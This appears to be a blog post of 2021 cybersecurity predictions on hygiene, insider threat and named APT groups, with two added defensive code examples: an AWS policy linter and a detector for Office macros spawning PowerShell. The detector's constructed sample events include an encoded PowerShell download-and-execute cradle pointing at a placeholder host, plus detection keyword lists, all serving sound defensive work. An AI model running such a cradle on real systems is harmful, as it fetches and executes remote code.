It seems everyone is making predictions for 2021. If we learned nothing else from 2020, it is that “The best-laid schemes of Mice and Men often go awry, and leave us nothing but grief and pain, for promised joy” (Burns, Robert, 1785). Nevertheless, I will throw my two cents into the mix.
For 2021 I see our cybersecurity challenges falling into four distinct areas: cybersecurity hygiene, threat profiling and tuning, insider threat, and Advanced Persistent Threat (APT) activity. Expect an uptick in, and an increasingly brazen pattern of, attacks from APTs around the world. Keeping up our cybersecurity hygiene will be paramount to thwarting these onslaughts. Threat profiling will prioritize the attacks we are most likely to need to defend against. We will require more visibility into insider activity, along with risk scoring, to understand where information exposure is (or is becoming) a risk. And lastly, we must know our enemy: where they strike, why, and how. As critical infrastructure upgrades its Operational Technology (OT) environments, it opens them to more common IT-based attacks, which complicates the security of these increasingly connected environments.
As most security professionals know, a large percentage of nefarious events are “crimes of opportunity”: access doors left open, S3 buckets mismanaged, application developers not accounting for proper identity and access management (IAM) in their apps, and so on. We should give special attention to strengthening our IAM provisioning and de-provisioning programs, shoring up our testing and change-control processes, and streamlining the processes that close the gap from “detection to remediation” in our vulnerability management programs. These process improvements, coupled with the standard tool deployments of SIEM, next-generation AV, EDR, rogue WAP prevention, and properly configured, maintained, and deployed firewalls, will help defend against the mounting threat this coming year. Oh, and, no matter your development lifecycle, implement an application security (AppSec) program now, not later, but now.
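The “crimes of opportunity” above are usually visible in a policy document long before anyone exploits them. The following is an added example, not code from the original post: a small linter for AWS policy JSON that flags a bucket opened to everyone and an identity policy that is effectively full admin, beside a scoped policy that passes. The three policy documents are constructed samples; the account ID, bucket and role names are placeholders.

```python
# Added example, not code from the original post: a small linter for AWS
# policy documents that flags the "crime of opportunity" misconfigurations
# mentioned above (buckets opened to everyone, over-broad IAM grants).
# The three policy documents at the bottom are constructed samples.
import json


def _as_list(value):
    """Policy JSON allows a string or a list in most fields; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_public_principal(principal):
    """True when a statement's Principal is anyone: "*" or {"AWS": "*"}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def lint_policy(policy_json):
    """Return a list of (severity, sid, message) findings for one policy document.

    Checks are deliberately simple: a public Principal without any Condition,
    and wildcard actions over all resources. A Condition is treated as a
    mitigating control here; a real review would still inspect its keys.
    """
    policy = json.loads(policy_json)
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue  # Deny statements narrow access; only Allow can open it
        sid = stmt.get("Sid", f"Statement[{idx}]")
        actions = _as_list(stmt.get("Action"))
        resources = _as_list(stmt.get("Resource"))

        # Resource policy (e.g. an S3 bucket policy) granted to the world.
        if _is_public_principal(stmt.get("Principal")) and not stmt.get("Condition"):
            can_write = any(a in ("*", "s3:*") or a.startswith(("s3:Put", "s3:Delete"))
                            for a in actions)
            findings.append(("HIGH" if can_write else "MEDIUM", sid,
                             "public Principal with no Condition; actions: " + ", ".join(actions)))

        # Identity policy that is effectively full admin.
        if "*" in actions and "*" in resources:
            findings.append(("HIGH", sid, "Action '*' on Resource '*' (full admin)"))
        elif "*" in resources and any(a.endswith(":*") for a in actions):
            findings.append(("MEDIUM", sid, "service-wide wildcard action on all resources"))
    return findings


# Constructed sample: a bucket policy that lets anyone list and read objects.
PUBLIC_BUCKET_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PublicRead",
        "Effect": "Allow",
        "Principal": "*",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": ["arn:aws:s3:::example-bucket", "arn:aws:s3:::example-bucket/*"],
    }],
})

# Constructed sample: an identity policy a developer attached "to make it work".
ADMIN_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Sid": "AllowAll", "Effect": "Allow", "Action": "*", "Resource": "*"}],
})

# Constructed sample: the hardened form, scoped to one role and one key prefix.
SCOPED_BUCKET_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AppReadOnly",
        "Effect": "Allow",
        "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-reader"},
        "Action": "s3:GetObject",
        "Resource": "arn:aws:s3:::example-bucket/app/*",
    }],
})

if __name__ == "__main__":
    for name, doc in [("public", PUBLIC_BUCKET_POLICY), ("admin", ADMIN_POLICY),
                      ("scoped", SCOPED_BUCKET_POLICY)]:
        print(name, lint_policy(doc))
```

The same function can be pointed at the output of `aws s3api get-bucket-policy` or `aws iam get-policy-version` in a nightly job, which is the kind of “detection to remediation” loop the paragraph argues for: the finding carries the statement Sid, so the ticket names the exact line to fix.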
The focus on excellent cyber hygiene at home brings us to a shifting landscape in global APT threats. According to the latest analysis, these groups will step up (and already have stepped up) their “brazen” attack attempts on their target audiences. Not, however, without leaving notable intelligence in the form of their “calling card” indicators of compromise (IoCs).
APT10, a Chinese group (also known as Red Apollo), infiltrates “supplier” networks to disrupt the supply chain, steal intellectual property for the Chinese Government, or leverage the supplier to dive deeper into the government or customer’s systems. Paraphrased from their FBI “wanted poster”: APT 10 conducted extensive campaigns of global intrusions into computer systems aiming to steal, among other data, intellectual property and confidential business and technological information from at least 45 commercial and defense technology companies in at least a dozen states, from managed service providers (“MSPs”), which are companies that remotely manage the information technology infrastructure of businesses and governments around the world, and from U.S. government agencies. The victim companies targeted by ZHU HUA and ZHANG SHILONG were involved in a diverse array of commercial activity, industries, and technologies, including aviation, space and satellite technology, manufacturing technology, oil and gas exploration, production technology, communications technology, computer processor technology, and maritime technology. In addition, for example, the APT 10 Group’s campaign compromised the data of an MSP and certain of its clients located in at least 12 countries, including Brazil, Canada, Finland, France, Germany, India, Japan, Sweden, Switzerland, the United Arab Emirates, the United Kingdom, and the United States.
APT41, a Chinese group (also known as Double Dragon), is transitioning from outright attacks to “hacking for hire,” or Crime as a Service (CaaS). Paraphrased from their FBI “wanted poster”: they face D.C. Grand Jury charges, including Unauthorized Access to Protected Computers, Aggravated Identity Theft, Money Laundering, and Wire Fraud. These charges primarily stem from alleged activity targeting high technology and video gaming companies and a United Kingdom citizen.
On August 11, 2020, a Grand Jury in the District of Columbia returned an indictment against Chinese nationals QIAN Chuan, FU Qiang, and JIANG Lizhi on charges including Racketeering, Money Laundering, Fraud, Identity Theft, and Access Device Fraud.
These charges stem from their alleged unauthorized computer intrusions while employed by Chengdu 404 Network Technology Company. The defendants allegedly conducted supply chain attacks to gain unauthorized access to networks throughout the world, targeting hundreds of companies representing a broad array of industries: social media, telecommunications, government, defense, education, and manufacturing. These victims included companies in Australia, Brazil, Germany, India, Japan, and Sweden. The defendants allegedly targeted telecommunications providers in the United States, Australia, China (Tibet), Chile, India, Indonesia, Malaysia, Pakistan, Singapore, South Korea, Taiwan, and Thailand. The defendants allegedly deployed ransomware attacks and demanded payments from victims. APT41 is now taking orders for your desired level of “Christmas Chaos” ahead of the holidays. Okay, that was an editorial comment meant as a joke – but often, jokes are founded in truth.
APT34, an Iranian group (also known as Helix Kitten), targets similar entities to its sister team APT33 (also known as Elfin Team or Refined Kitten). APT33 reportedly targeted aerospace, defense, and petrochemical industry targets in the United States, South Korea, and Saudi Arabia. APT34 appears to focus on societal disruption, looking at organizations in the financial, energy, telecommunications, and chemical industries, and at critical infrastructure systems. They leverage “not so creative” methods to infiltrate their targets: Microsoft Excel macros, PowerShell-based attacks, and social engineering. This use of IT-born attack vectors exacerbates the security challenge. The shift in OT within our critical infrastructure toward common IT components and networking will open the door to equally common IT security exploits and challenges.
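The “not so creative” chain described above (an Excel macro launching PowerShell, often with an encoded command and a download cradle) is also one of the easier ones to detect from process-creation telemetry. The following is an added example, not code from the original post: detection logic run over constructed process-creation events in the shape of Sysmon Event ID 1 fields (ParentImage, Image, CommandLine). Hostnames and the example.invalid URL are placeholders, and the list of shell children and the encoded-flag spellings are assumptions that a real rule set would tune further.

```python
# Added example, not code from the original post: detection logic for the
# "Office macro spawns PowerShell" pattern the text associates with APT34-style
# intrusions, run over constructed process-creation events shaped like Sysmon
# Event ID 1 fields (ParentImage, Image, CommandLine). No real host data.
import base64
import re

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                  "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings most often seen in the wild (assumed list, extend as needed).
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                          re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
DOWNLOAD_CRADLE = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ", "bitstransfer")


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE text), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(event):
    """Return a finding for one process-creation event, or None if it is not suspicious."""
    parent, child = _basename(event["ParentImage"]), _basename(event["Image"])
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None
    decoded = decode_encoded_command(event["CommandLine"])
    indicators = []
    if decoded is not None:
        indicators.append("encoded_command")
    if HIDDEN_WINDOW.search(event["CommandLine"]):
        indicators.append("hidden_window")
    # Inspect the decoded script when there is one, otherwise the raw command line.
    text = (decoded or event["CommandLine"]).lower()
    if any(marker in text for marker in DOWNLOAD_CRADLE):
        indicators.append("download_cradle")
    return {"host": event["Computer"], "parent": parent, "child": child,
            "decoded": decoded, "indicators": indicators}


def run_detection(events):
    return [f for f in map(triage_event, events) if f is not None]


def encode_command(script):
    """Encode a script the way 'powershell -EncodedCommand' expects (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    {"Computer": "FIN-WS-07", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc "
                    + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")},
    {"Computer": "IT-ADMIN-01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -File C:\\scripts\\inventory.ps1"},
    {"Computer": "HR-WS-12", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami > C:\\Users\\Public\\w.txt"},
    {"Computer": "FIN-WS-07", "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "C:\\Windows\\splwow64.exe 12288"},
]

if __name__ == "__main__":
    for finding in run_detection(SAMPLE_EVENTS):
        print(finding["host"], finding["parent"], "->", finding["child"], finding["indicators"])
```

The parent/child pairing does the real work: an administrator running PowerShell from Explorer and Excel spawning the print helper both pass through untouched, while a Word document launching cmd.exe is reported even with no other indicator, because in most fleets that pairing alone is rare enough to be worth a look. Decoding the encoded command before matching matters; the download cradle is invisible in the raw command line.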
This focus on critical infrastructure seems concerning to me. In 2002, I was privileged enough to be invited to participate in the “Digital Pearl Harbor” study at the Naval War College. The findings from the study were “downplayed” and “watered down” so as not to cause too much public concern so shortly after 9/11; the results of the scenario testing, to most of the 90 or so participants, were nothing short of terrifying. I live by a theory that “surprise attack planning,” hard dates and target parameters notwithstanding, has flexibility in the project timeline.
So, my predictions are not all gloom and doom. The actual message of my prediction is that we now have an exciting opportunity to look closely and critically at ourselves. We need to evaluate our cyber hygiene, our threat profiling, and our insider threat program (including the necessary operational checks and balances), and flesh out and drive our APT mitigation strategy and playbooks. “Knowledge is power” (Bacon, Francis, 1597). The more we know about ourselves, our defenses, our gaps, and our adversaries, the more effectively we can spread our security budget.